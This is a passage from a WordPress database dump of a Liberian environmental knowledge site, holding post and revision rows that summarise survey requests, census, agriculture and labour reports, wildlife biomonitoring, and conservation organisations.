10:06:29','2021-08-23 10:06:29','','CCCD INDIVIDUAL ASSESSMENT','','inherit','open','closed','','cccd-individual-assessment','','','2021-08-23 10:06:29','2021-08-23 10:06:29','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-INDIVIDUAL-ASSESSMENT.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(4249,42,'2021-08-23 10:06:33','2021-08-23 10:06:33','','CCCD JINGLE AND PUBLIC SERVICE ANNOUNCEMENT','','inherit','open','closed','','cccd-jingle-and-public-service-announcement','','','2021-08-23 10:06:33','2021-08-23 10:06:33','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-JINGLE-AND-PUBLIC-SERVICE-ANNOUNCEMENT.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(4250,42,'2021-08-23 10:16:23','2021-08-23 10:16:23','The consultancy aims to examine the awareness level among Liberians (public, institutions and organizations and rural settlers), to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts climate change, biological conservation and land degradation. A review of previous related surveys is also required amongst a survey of the public, institutions, individuals and other relevant groups. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-ASSESSMENT-PUBLIC-AWARENESS-OF-RIO-CONVENTIONS-IMPLEMENTATIONS.docx\" target=\"_blank\" rel=\"noopener\">Survey to Assess Public Awareness</a></em>','Request for Expression of Interest: A Survey to Assess Public Awareness of the Importance of the RIO Conventions','','inherit','closed','closed','','3790-revision-v1','','','2021-08-23 10:16:23','2021-08-23 10:16:23','',3790,'https://ekmsliberia.info/?p=4250',0,'revision','',0),(4251,42,'2021-08-23 10:25:10','2021-08-23 10:25:10','The consultancy aims to examine the awareness level among individuals to gather additional inputs on national priorities and constraints for improved and sustained environmental governance, to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts of climate change, biological conservation and land degradation. A review of previous related surveys is also required. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.\n\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-INDIVIDUAL-ASSESSMENT.docx\" target=\"_blank\" rel=\"noopener\">Individual Interviews to Gather Additional Inputs</a>','Request for Expression of Interest: Individual Interviews to gather additional inputs on National Priorities and Constraints','','inherit','closed','closed','','3791-autosave-v1','','','2021-08-23 10:25:10','2021-08-23 10:25:10','',3791,'https://ekmsliberia.info/?p=4251',0,'revision','',0),(4252,42,'2021-08-23 10:25:28','2021-08-23 10:25:28','The consultancy aims to examine the awareness level among individuals to gather additional inputs on national priorities and constraints for improved and sustained environmental governance, to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts of climate change, biological conservation and land degradation. A review of previous related surveys is also required. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-INDIVIDUAL-ASSESSMENT.docx\" target=\"_blank\" rel=\"noopener\">Individual Interviews to Gather Additional Inputs</a></em>','Request for Expression of Interest: Individual Interviews to gather additional inputs on National Priorities and Constraints','','inherit','closed','closed','','3791-revision-v1','','','2021-08-23 10:25:28','2021-08-23 10:25:28','',3791,'https://ekmsliberia.info/?p=4252',0,'revision','',0),(4253,42,'2021-08-23 10:42:14','2021-08-23 10:42:14','','Untitled','','inherit','open','closed','','untitled-4','','','2021-08-23 10:42:14','2021-08-23 10:42:14','',2297,'https://ekmsliberia.info/wp-content/uploads/2019/11/Untitled.png',0,'attachment','image/png',0),(4254,42,'2021-08-23 10:43:00','2021-08-23 10:43:00','The individual ownership of land in Liberia has long been recognized and all such ownership stems from grants of land made to individuals and purchases from local people. Dealings in private lands are regulated by law and are recorded in a Deeds Registry. By the 1960s the\r\nstatus of information in the registries was so uncertain that in 1971 the government asked UNDP to provide assistance to undertake a pilot Cadastral Survey in Monrovia with the hopes to establishing an Office of Land Register to cure the defects of the existing system of\r\ndeeds registration. Following the enactment of the land registration law in 1974 (Chapter 8 of the Property Law) the government of Liberia began to implement a pilot systematic land title registration program. This activity ceased shortly after the coup in 1980.\r\n\r\nThe current situation in the deeds registry has not improved from the late 1970’s and in fact has probably gotten much worse to the point that there is currently a total lack of trust with the system. Many records were destroyed during the years of turmoil. Many transactions\r\nhave occurred with little reference to existing documents or previous transactions, leading to a situation of parcels being subdivided and sold with no accompanying adjustment to the mother deed. Many fraudulent documents have entered the system with little ability to correct the information prior to its being entered in the register. The overall result of this situation is that there exist seemingly valid yet conflicting documents, as well as many fraudulent documents registered with land-related Government institutions. As people are dissatisfied with the existing deed registration system, there is growing pressure to replace the existing system with an alternative title registration system.','Title Registration Report','','inherit','closed','closed','','2297-revision-v1','','','2021-08-23 10:43:00','2021-08-23 10:43:00','',2297,'https://ekmsliberia.info/?p=4254',0,'revision','',0),(4256,42,'2021-08-23 10:49:04','2021-08-23 10:49:04','','wildlide','','inherit','open','closed','','wildlide','','','2021-08-23 10:49:04','2021-08-23 10:49:04','',3096,'https://ekmsliberia.info/wp-content/uploads/2020/06/wildlide.png',0,'attachment','image/png',0),(4257,42,'2021-08-23 10:49:53','2021-08-23 10:49:53','A- Generalities and Survey Methodology In 2013, a corridor linking Proposed Grebo-Krahn National Park(PGKNP) with the Sapo National Park (SNP) was identified, under the Taï-Grebo-Sapo Transboundary Corridor Initiative, a scheme led by the Governments of Côte d’Ivoire and Liberia. The corridor runs through a major logging concession (FMC ‘F’) and community land (Putu and Chedepo Districts of Grand Gedeh and River Gee counties respectively). To evaluate the feasibility and potential impact of creating the corridor, a survey was led to measure the presence of both wildlife and anthropogenic threats inside the corridor. The survey would also provide a first idea of the potential boundary lines of the corridor. Supervised by trained WCF staff and FDA rangers, 3 teams of trained FDA rangers, auxiliaries and community members walked 103.17 km across two systematic transect designs (1 for the concession, 1 for the community land) between the 28th of May 2015 and the 15th of July 2015. Data was collected on the presence of large mammal and anthropogenic activities. Data was collected following IUCN Standards for Great Ape Surveys (Kühl et al., 2008).\r\n\r\nB- Abundance and spatial distribution of large mammals in the Grebo-Sapo Corridor (GSCor) Data was analysed to determine the encounter rates for each species and the spatial distribution of target species (chimpanzees, monkeys, duikers, etc.). A population estimate of chimpanzees in the survey area of FMC-F was also calculated and provided the current estimate of 688 individuals. Surprising levels of biodiversity were discovered in both FMC-F and the community corridor with signs of 7 species of monkey found in both FMC-F and the community corridor.\r\n\r\nC-Threats to wildlife of the GSCor The data collected on anthropogenic activities was treated in the same way as the wildlife data. Signs of hunting were found in both survey areas at levels which are likely to be having an impact on wildlife in the proposed corridor, higher than in the Proposed Grebo-Krahn National Park. Encounter rates of activities leading to deforestation were surprisingly low for a logging concession and community land, which is a positive result. The largest threat to wildlife in the surveyed areas is hunting activity which fuels the bush meat trade. Note that a large mining camp is located in the FMC F corridor and it appears that the consumption of bushmeat there is extremely high.\r\n\r\nD-Conclusion and Recommendations A corridor between PGKNP and SNP has been presented based on the results of this report. It is vital that all affected stakeholders meet to discuss the boundary lines of the corridor and the management strategies needed to maintain it. Given that the corridor falls in three different types of land-use (National Forest, logging concession and community forest) the creation of a successful corridor will be a complex and delicate process.','FINAL REPORT: Survey of Wildlife and Anthropogenic threats in the Grebo-Sapo Corridor, South-eastern Liberia','','inherit','closed','closed','','3096-revision-v1','','','2021-08-23 10:49:53','2021-08-23 10:49:53','',3096,'https://ekmsliberia.info/?p=4257',0,'revision','',0),(4259,42,'2021-08-23 10:53:23','2021-08-23 10:53:23','','census','','inherit','open','closed','','census','','','2021-08-23 10:53:23','2021-08-23 10:53:23','',3102,'https://ekmsliberia.info/wp-content/uploads/2020/07/census.png',0,'attachment','image/png',0),(4260,42,'2021-08-23 10:54:49','2021-08-23 10:54:49','A census is the total process of collecting, compiling, evaluating, analyzing and disseminating demographic, economic, social and spatial data pertaining, at a specific\r\ntime, to all persons in a country or a well-delimited part of a country.\r\nThe population and housing census conducted every decade is a complete count of all the people and households in Liberia. The results represent a snapshot of the\r\ndemographic and socio-economic characteristics of the populace of the country, thus enabling planners and policy-makers to measure changes in these\r\ncharacteristics over time. It is also the primary source of information about the number and characteristics of the population in each administrative area. It provides\r\na sampling frame and related functional projections that are necessary for sector planning which affects public expenditure in the areas of education, agriculture and\r\nhealth.\r\nThe census exercise provides information on the number of people living in a particular area as well as information on housing, health, education, employment,\r\nmigration, displacement and disability. The results of the census are important in identifying the extent and nature of social exclusion and resulting service need.\r\nCensus results are vital in supporting local and national government efforts in planning, implementation and monitoring the Millennium Development Goals (MDGs),\r\nInternational Conference on Population and Development (ICPD), Poverty Reduction Strategy (PRS), as well as support of research and business decision-making\r\nprocesses.\r\nThe objective of this atlas is to present the 2008 Liberia Population and Housing Census in an accessible form for a variety of users in the public and private sectors.\r\nThe atlas highlights the similarities and differences in the socio-economic and demographic conditions between the counties of Liberia, using a number of key\r\nvariables in the form of maps, charts and tables. The maps show the spatial distribution of the population and their demographic characteristics within counties with\r\nbrief description of each topic along with corresponding charts.\r\nData Collection\r\nDue to the civil war, Liberia did not conduct the 1994 and 2004 rounds of censuses. However, on April 21, 2007, the 52nd National Legislature enacted the law\r\nempowering the Executive Branch of Government to conduct Liberia’s fourth census in March 2008. The population and housing census was conducted on March\r\n28, 2008 and data collection lasted for a period of ten days.\r\nThe aim of the enumeration was to take a count of all persons who were within the border of Liberia by midnight of March 20th (Census Night). Enumeration started\r\non March 21st including the canvassing of institutional and floating populations. The completed questionnaires/schedules were assembled at the divisional census\r\noffices for quick checks and validation, such that all cases which required call backs, were attended before the questionnaires were finally dispatched to Monrovia.','2008 Census Atlas Report','','inherit','closed','closed','','3102-revision-v1','','','2021-08-23 10:54:49','2021-08-23 10:54:49','',3102,'https://ekmsliberia.info/?p=4260',0,'revision','',0),(4261,42,'2021-08-23 10:57:57','2021-08-23 10:57:57','','production','','inherit','open','closed','','production','','','2021-08-23 10:57:57','2021-08-23 10:57:57','',3104,'https://ekmsliberia.info/wp-content/uploads/2020/07/production.png',0,'attachment','image/png',0),(4262,42,'2021-08-23 10:58:09','2021-08-23 10:58:09','Statistical information on agricultural production, prices and market conditions play a central role in the Liberian economy in terms of contribution to income generation, employment and food security for most families. This is precisely why the Ministry of Agriculture (MOA) in collaboration with Liberia Institute of Statistics and GeoInformation Services (LISGIS) exerted significant efforts to revive the activities of agricultural survey. This summary provides an insight into all major components of the 2008 agricultural survey results. The document highlights major characteristics of agricultural activities including production of food crops and livestock.\r\n\r\n<strong>Objective</strong>\r\nThe overall objective of the publication is to provide statistics on food and agriculture for effective planning and the monitoring of agricultural sector for policy and administrative decisions.\r\n\r\n<strong>Main Source of Data</strong>\r\nThe main source of data for the publication was the 2008 agricultural sample survey which used the conventional method with a well-prepared questionnaire.\r\n\r\n<strong>Methodology</strong>\r\nThe sample design for the 2008 survey was a multi-stage sampling with: (a) Enumeration Areas (EAs) as the primary sampling units (PSUs), (b) Agricultural Holders (Ahs) within EA as the secondary sampling units (SSUs), (c) Holders’ Rice Farms (HRFs) as the tertiary sampling unit, and (d) Experimental plots for crop-cutting in selected farms as the ultimate stage-sampling unit. The sampling design was adopted\r\nwith each county as domain of study. Three (3) sets of questionnaires were developed and administered, namely: Households\r\nlisting questionnaire, Holders’ questionnaire and Field and Yields measurement questionnaires. These questionnaires were used to probe only those households with member participating in agricultural activities. Each completed questionnaire was\r\nscrutinized in the field and further scrutiny was done in the central office. Range and internal consistency checks were adopted.\r\n\r\n&nbsp;','PRODUCTION ESTIMATES OF MAJOR CROPS AND ANIMALS – 2008 REPORT','','inherit','closed','closed','','3104-revision-v1','','','2021-08-23 10:58:09','2021-08-23 10:58:09','',3104,'https://ekmsliberia.info/?p=4262',0,'revision','',0),(4264,42,'2021-08-25 10:53:23','2021-08-25 10:53:23','This report presents the main results of the Liberia Labour Force Survey 2010. The survey was conducted jointly by the Ministry of Labour and the Liberia Institute of Statistics and Geo‐Information Services (LISGIS), and the fieldwork took place over a three‐month period from February to May 2010. Technical support was provided by the International Labour Office. This survey report is based on data collected from 6233 households in 523 enumeration areas spread around the country. Socio‐demographic information was collected from about 32,000 household members, and more detailed information on each person’s economic activity was collected from about 25,000 household members aged 5 and over. Most of the data presented in this LFS report relates to the population aged 15 and over, and is based on data collected from about 17,000 individuals. In an effort to have a larger sample for this survey, and to make government data collection more efficient, fieldwork for this survey was combined with the fieldwork for the Core Welfare Indicators Questionnaire (CWIQ) survey and with another survey module on human rights. As a result, the larger sample allows for estimates to be made down to the county level, which had not been possible on previous surveys such as CWIQ 2007 and DHS 2007. According to the survey data, it is estimated that the number of people aged 15 and over in each activity status is as shown in the table below:','Report on the Liberia Labour Force Survey 2010','','inherit','closed','closed','','3107-autosave-v1','','','2021-08-25 10:53:23','2021-08-25 10:53:23','',3107,'https://ekmsliberia.info/?p=4264',0,'revision','',0),(4265,42,'2021-08-25 10:57:46','2021-08-25 10:57:46','','Untitled','','inherit','open','closed','','untitled-5','','','2021-08-25 10:57:46','2021-08-25 10:57:46','',3107,'https://ekmsliberia.info/wp-content/uploads/2020/07/Untitled.png',0,'attachment','image/png',0),(4266,42,'2021-08-25 10:58:02','2021-08-25 10:58:02','This report presents the main results of the Liberia Labour Force Survey 2010. The survey was conducted jointly by the Ministry of Labour and the Liberia Institute of Statistics and Geo‐Information Services (LISGIS), and the fieldwork took place over a three‐month period from February to May 2010. Technical support was provided by the International Labour Office. This survey report is based on data collected from 6233 households in 523 enumeration areas spread around the country. Socio‐demographic information was collected from about 32,000 household members, and more detailed information on each person’s economic activity was collected from about 25,000 household members aged 5 and over. Most of the data presented in this LFS report relates to the population aged 15 and over, and is based on data collected from about 17,000 individuals. In an effort to have a larger sample for this survey, and to make government data collection more efficient, fieldwork for this survey was combined with the fieldwork for the Core Welfare Indicators Questionnaire (CWIQ) survey and with another survey module on human rights. As a result, the larger sample allows for estimates to be made down to the county level, which had not been possible on previous surveys such as CWIQ 2007 and DHS 2007. According to the survey data, it is estimated that the number of people aged 15 and over in each activity status is as shown in the table below:','Report on the Liberia Labour Force Survey 2010','','inherit','closed','closed','','3107-revision-v1','','','2021-08-25 10:58:02','2021-08-25 10:58:02','',3107,'https://ekmsliberia.info/?p=4266',0,'revision','',0),(4267,42,'2021-08-25 11:25:26','2021-08-25 11:25:26','','WCF annual report','','inherit','open','closed','','wcf-annual-report','','','2021-08-25 11:25:26','2021-08-25 11:25:26','',3097,'https://ekmsliberia.info/wp-content/uploads/2020/06/WCF-annual-report.png',0,'attachment','image/png',0),(4268,42,'2021-08-25 11:25:45','2021-08-25 11:25:45','Biomonitoring and law enforcement in the Taï-Grebo-Sapo Forest Complex\r\nIn 2019, a biomonitoring survey focused on the proposed conservation corridor between GreboKrahn National Park (GKNP) and Sapo National Park (SNP) and revealed a high hunting pressure and a possible decrease of the chimpanzee population by 22.5%.\r\nIn Taї National Park (TNP) and GKNP, a new approach of biomonitoring was developed in 2019 and data collection will continue in 2020. This method uses camera traps for TNP, and a combination of line transects and camera traps for GKNP. Preliminary results from TNP identified 71 animal species including 46 mammals. The anti-poaching program in the research and ecotourism area in TNP revealed this year the lowest encounter rate of illegal activities (0.47 signs/km) since 2008, after 12 years of data collection.\r\n\r\nIn 2019, eco-guards pursued data collection in Cavally Classified Forest. The deforestation rate slowed down this year compared to 2017 and 2018. This is positive, but not enough to ensure the preservation of the forest. Additional government efforts are required in 2020 to stop deforestation for the sake of cocoa farming.\r\n\r\nIn 2019, a documentary on WCF’s Independent Forest Monitoring (IFM) on the deforestation issues in the Cavally Classified Forest has been broadcasted in January 2020. The 8th IFM report and analyses of the evolution of the number of offences detected in the Cavally Classified Forest highlight an important decrease in the number of the most frequent offences between 2012 and 2018, demonstrating the importance of independent monitoring. WCF is leading a civil society initiative consisting in developing synergies with actors from the private and public sectors involved in the enforcement of the European Union Timber Regulation (EUTR).\r\n\r\nWCF has participated with a local NGO called NOFNA in several surveys on bush-meat, cocoa trafficking, and corruption. The denunciation of these traffics weakened the illegal activities, because the authorities reacted regularly to these denunciations.\r\n\r\nAwareness raising campaigns in the Taï-Grebo-Sapo Forest Complex\r\nIn 2019, 13,244 persons in Liberia and 18,777 in Côte d’Ivoire assisted the WCF awareness activities in the Taï-Grebo-Sapo Forest Complex, implemented by the eco-guards and Community Watch Teams (CWT). In Côte d’Ivoire, the Taï eco-museum attracted 994 visitors.\r\nWCF initiated a survey in 15 villages neighboring TNP to assess the impact of the theater performances in 2019 on the perception of the local population. 607 people were interviewed and the interviewees who had seen the play said to better understand the role of OIPR and the benefits they have from the park. They were more willing to help protect the park (81.33%), than those who did not see the play (51.65%).','Annual Report 2019  Activities of the Wild Chimpanzee Foundation for improved conservation of chimpanzees and their habitat in West Africa','','inherit','closed','closed','','3097-revision-v1','','','2021-08-25 11:25:45','2021-08-25 11:25:45','',3097,'https://ekmsliberia.info/?p=4268',0,'revision','',0),(4269,42,'2021-08-25 11:32:17','2021-08-25 11:32:17','','wcf','','inherit','open','closed','','wcf-4','','','2021-08-25 11:32:17','2021-08-25 11:32:17','',3092,'https://ekmsliberia.info/wp-content/uploads/2020/06/wcf-1.png',0,'attachment','image/png',0),(4270,42,'2021-08-25 11:32:28','2021-08-25 11:32:28','A- Generalities and methods of biomonitoring program This report presents results from the biomonitoring program in 2015 in the Proposed GreboKrahn National Park (PGKNP), undertaken by survey team members from the Forestry Development Authority (FDA) and local communities, and with the supervision of the Wild Chimpanzee Foundation (WCF). Data was collected between the 26th February 2015 and the 17th of June 2015. A total of 249.32km of line transects were surveyed across the park, following the same systematic design from 2014. Data was collected on the signs of presence of large mammals, hunting and habitat disturbance (farming, mining, etc.). It was then analysed to determine the current status of wildlife and threats within the proposed park, as well as monitor their population trends.\r\n\r\nB- Abundance and spatial distribution of large mammals in Proposed Grebo-Krahn National Park (PGKNP) Two types of information were recorded: direct observations of large mammals and other animals and their indirect observations (dung, footprints, vocalizations, feeding sites and sleeping nests for chimpanzee...). Data was analysed to determine the encounter rates for each species and the spatial distribution of target species (chimpanzees, monkeys, duikers, etc.). A population estimate of chimpanzees was also calculated and provided the current estimate of 313 individuals. The data supports the idea of a stabilisation of the chimpanzee population as it is within the confidence limits of the 2014 population estimate. Some variation in distribution and encounter rates of other mammals have been documented but a longer time perspective is needed before confirming potential population trends. The isolated patch in the south of the park is an important area for biodiversity and endangered species and signs of wildlife along the Cavalla River have increased since the first phase of biomonitoring.\r\n\r\nC-Threats to wildlife of the PGNP The data collected on anthropogenic activities was treated in the same way as the wildlife data. Results seem do show a marked decrease in hunting activity, but these results must be treated with caution as the Ivorian border has been closed and there has been a ban on bush meat since the Ebola outbreak in Liberia. The expansion of Boley Village is now clearly having a negative effect of the wildlife in the horn in the north of the park. Chewing stick signs were still high within the park, but since the end of data collection law enforcement missions have taken place targeting chewing stick camps within PGKNP.\r\n\r\nD-Conclusion and Recommendations Though PGKNP still harbours high levels of biodiversity and hunting levels have decreased, FDA needs to remain vigilant that hunting pressures do not increase in a post-Ebola environment. The eviction of Boley Village must be a priority as the negative impact of hunting and farming in this settlement is having an effect on the distribution of wildlife in the north of the park. Continuing the process leading to the pre-gazettement of the park is essential in 2016 with activities such as boundary line flagging, community consultations, regional and national level meetings needed before the gazettement package can be submitted.','Biomonitoring in the Proposed Grebo-Krahn National Park REPORT ON PHASE 2','','inherit','closed','closed','','3092-revision-v1','','','2021-08-25 11:32:28','2021-08-25 11:32:28','',3092,'https://ekmsliberia.info/?p=4270',0,'revision','',0),(4275,42,'2021-07-20 15:46:00','2021-07-20 15:46:00','<!-- wp:paragraph -->\n<p>A team of technicians and environmental scientists from Liberia Environmental Protection Agency (EPA) headed by Deputy Executive Director, Hon. Randall M. Dobayou on Monday 19 July 2021 carried-out an assessment engagement at the Omega Market in Paynesville, outside Monrovia. The assessment engagement follows the naming of the EPA on a Special Presidential Committee by His Excellency Dr. George Manneh Weah. His Excellency Dr. George Manneh Weah, on Friday, April 16 2021 appointed a Special Presidential Committee for the comprehensive cleanup exercise of all county capitals and the city of Paynesville. The cleanup exercise will kick start through the effective implementation of a 90-day Action Plan, commencing Friday, July 16, 2021, ahead of the 2021 July 26 Independence, which is to be celebrated by all Liberians. The 90-day Action Plan is part of the Government\'s Reform measures on the efficient management of market grounds in the country, with an initial focus on the grounds of the newly constructed Omega Market in the City of Paynesville. The Special Presidential Committee will be headed by the Ministry of Public Works as Chair and Co-chaired by the Monrovia City Corporation.</p>\n<!-- /wp:paragraph -->','A Team of Technicians and Environmental Scientists along with Hon. Randall Dobayou Carries out Assessment at Omega Market','','publish','open','open','','a-team-of-technicians-and-environmental-scientists-along-with-hon-randall-dobayou-carries-out-assessment-at-omega-market','','','2021-09-03 09:48:07','2021-09-03 09:48:07','',0,'https://ekmsliberia.info/?p=4275',158,'post','',0),(4276,42,'2021-09-03 09:45:29','2021-09-03 09:45:29','','omega market','','inherit','open','closed','','omega-market','','','2021-09-03 09:45:29','2021-09-03 09:45:29','',4275,'https://ekmsliberia.info/wp-content/uploads/2021/09/omega-market.png',0,'attachment','image/png',0),(4277,42,'2021-09-03 09:48:03','2021-09-03 09:48:03','<!-- wp:paragraph -->\n<p>A team of technicians and environmental scientists from Liberia Environmental Protection Agency (EPA) headed by Deputy Executive Director, Hon. Randall M. Dobayou on Monday 19 July 2021 carried-out an assessment engagement at the Omega Market in Paynesville, outside Monrovia. The assessment engagement follows the naming of the EPA on a Special Presidential Committee by His Excellency Dr. George Manneh Weah. His Excellency Dr. George Manneh Weah, on Friday, April 16 2021 appointed a Special Presidential Committee for the comprehensive cleanup exercise of all county capitals and the city of Paynesville. The cleanup exercise will kick start through the effective implementation of a 90-day Action Plan, commencing Friday, July 16, 2021, ahead of the 2021 July 26 Independence, which is to be celebrated by all Liberians. The 90-day Action Plan is part of the Government\'s Reform measures on the efficient management of market grounds in the country, with an initial focus on the grounds of the newly constructed Omega Market in the City of Paynesville. The Special Presidential Committee will be headed by the Ministry of Public Works as Chair and Co-chaired by the Monrovia City Corporation.</p>\n<!-- /wp:paragraph -->','A Team of Technicians and Environmental Scientists along with Hon. Randall Dobayou Carries out Assessment at Omega Market','','inherit','closed','closed','','4275-revision-v1','','','2021-09-03 09:48:03','2021-09-03 09:48:03','',4275,'https://ekmsliberia.info/?p=4277',0,'revision','',0),(4280,38,'2021-09-08 00:25:17','2021-09-08 00:25:17','This State of the Environment Report (SoER), drafted by Green Consultancy Inc. (Greencons), considers three essential country resources (or themes) which can be used for assessing Liberia’s environmental state and trends.\r\n\r\nThey are: Terrestrial Resources (forestry, soil, etc.); Aquatic Resources; and Cross-Sectional Resources and Environmental Linkages. Towards the end of the report, additional emerging environmental issues and concerns are also discussed. These include, for example, human trafficking, climate change, Invasive Alien Species (IAS), illegal fishing, the usage of chemicals and solid waste management. The methodology for drafting the report largely involved a public notification period, a questionnaire which was administered by Greencons to a range of stakeholders across Liberia, site assessments and strategic sampling, Focus Group Discussions (FGDs), and Key Informant Interviews (KIIs).','STATE OF THE ENVIRONMENT REPORT FOR LIBERIA','','inherit','closed','closed','','4238-revision-v1','','','2021-09-08 00:25:17','2021-09-08 00:25:17','',4238,'https://ekmsliberia.info/?p=4280',0,'revision','',0),(4281,38,'2021-09-08 00:27:29','2021-09-08 00:27:29','The Convention on Biological Diversity (CBD) is one of the three conventions that make up the Rio Conventions.','Overview of the CBD','','inherit','closed','closed','','3257-revision-v1','','','2021-09-08 00:27:29','2021-09-08 00:27:29','',3257,'https://ekmsliberia.info/?p=4281',0,'revision','',0),(4282,38,'2022-03-10 11:08:21','2021-09-08 12:27:10','','Liberia Projects Dashboard','','publish','closed','closed','','liberia-projects-dashboard','','','2022-03-10 11:08:21','2022-03-10 11:08:21','',0,'https://ekmsliberia.info/?p=4282',8,'nav_menu_item','',0),(4283,38,'2022-03-10 11:08:21','2021-09-08 12:32:12','','Infrastructure Implementation Unit - Ministry of Public Work','','publish','closed','closed','','infrastructure-implementation-unit-ministry-of-public-work','','','2022-03-10 11:08:21','2022-03-10 11:08:21','',0,'https://ekmsliberia.info/?p=4283',9,'nav_menu_item','',0),(4284,38,'2022-03-10 11:08:21','2021-09-08 13:03:05','','Liberia National Meteorological Center - Ministry of Transport','','publish','closed','closed','','liberia-national-meteorological-center-ministry-of-transport','','','2022-03-10 11:08:21','2022-03-10 11:08:21','',0,'https://ekmsliberia.info/?p=4284',10,'nav_menu_item','',0),(4286,43,'2021-09-09 12:37:13','2021-09-09 12:37:13','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg 759w, https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo-300x269.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo-600x538.jpg 600w\" sizes=\"(max-width: 759px) 100vw, 759px\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"https://ekms-liberia.mn.co/?autojoin=1\" role=\"button\">\n						Signup, It\'s free!\n					</a>\n												<img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"\" loading=\"lazy\" />														\n		[gtranslate]','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-09-09 12:37:13','2021-09-09 12:37:13','',3800,'https://ekmsliberia.info/?p=4286',0,'revision','',0),(4288,43,'2021-09-10 07:08:12','2021-09-10 07:08:12','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-09-10 07:08:12','2021-09-10 07:08:12','',3901,'https://ekmsliberia.info/?p=4288',0,'revision','',0),(4290,43,'2021-09-10 07:19:13','2021-09-10 07:19:13','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-09-10 07:19:13','2021-09-10 07:19:13','',3901,'https://ekmsliberia.info/?p=4290',0,'revision','',0),(4291,43,'2021-09-10 07:20:36','2021-09-10 07:20:36','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-09-10 07:20:36','2021-09-10 07:20:36','',3901,'https://ekmsliberia.info/?p=4291',0,'revision','',0),(4293,43,'2021-09-10 11:37:01','2021-09-10 11:37:01','','MOA_news_photo','','inherit','open','closed','','moa_news_photo','','','2021-09-10 11:37:01','2021-09-10 11:37:01','',0,'https://ekmsliberia.info/wp-content/uploads/2021/09/MOA_news_photo.jpeg',0,'attachment','image/jpeg',0),(4301,43,'2021-09-10 11:57:59','2021-09-10 11:57:59','The Sea Turtle Watch (STW) Liberia is dedicated to saving endangered sea turtles from imminent extinction through community-based programs and development. \r\nWe work to conserve and recover the already declined sea turtle populations in Liberia through field monitoring, research, conservation education, advocacy and habitat protection. We work to ensure that the beaches are recognized as important nesting habitats and the territorial waters of Liberia are foraging grounds for sea turtles. We are working to improve national regulations and law enforcement which will positively impact the conservation status of sea turtles in Liberia. \r\nSTW is focused on protecting threatened and endangered marine turtles and their habitats along the Liberian coastline. Our long-term marine turtle conservation strategies are centered on establishing community sanctuaries or marine turtle reserves (Protected Areas) at important nesting sites in partnership with local coastal communities to protect critically endangered sea turtles occurring in Liberia.\r\n','Sea Turtle Watch','','publish','closed','closed','','sea-turtle-watch','','','2021-09-10 11:57:59','2021-09-10 11:57:59','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=4301',4,'institution','',0),(4302,43,'2021-09-10 11:56:16','2021-09-10 11:56:16','','logo','','inherit','open','closed','','logo-2','','','2021-09-10 11:57:59','2021-09-10 11:57:59','',4301,'https://ekmsliberia.info/wp-content/uploads/2021/09/logo.png',0,'attachment','image/png',0),(4303,43,'2021-09-10 11:57:37','2021-09-10 11:57:37','','featured_image_stw','','inherit','open','closed','','featured_image_stw','','','2021-09-10 11:57:37','2021-09-10 11:57:37','',4301,'https://ekmsliberia.info/wp-content/uploads/2021/09/featured_image_stw.png',0,'attachment','image/png',0),(4304,43,'2021-09-10 11:57:59','2021-09-10 11:57:59','The Sea Turtle Watch (STW) Liberia is dedicated to saving endangered sea turtles from imminent extinction through community-based programs and development. \r\nWe work to conserve and recover the already declined sea turtle populations in Liberia through field monitoring, research, conservation education, advocacy and habitat protection. We work to ensure that the beaches are recognized as important nesting habitats and the territorial waters of Liberia are foraging grounds for sea turtles. We are working to improve national regulations and law enforcement which will positively impact the conservation status of sea turtles in Liberia. \r\nSTW is focused on protecting threatened and endangered marine turtles and their habitats along the Liberian coastline. Our long-term marine turtle conservation strategies are centered on establishing community sanctuaries or marine turtle reserves (Protected Areas) at important nesting sites in partnership with local coastal communities to protect critically endangered sea turtles occurring in Liberia.\r\n','Sea Turtle 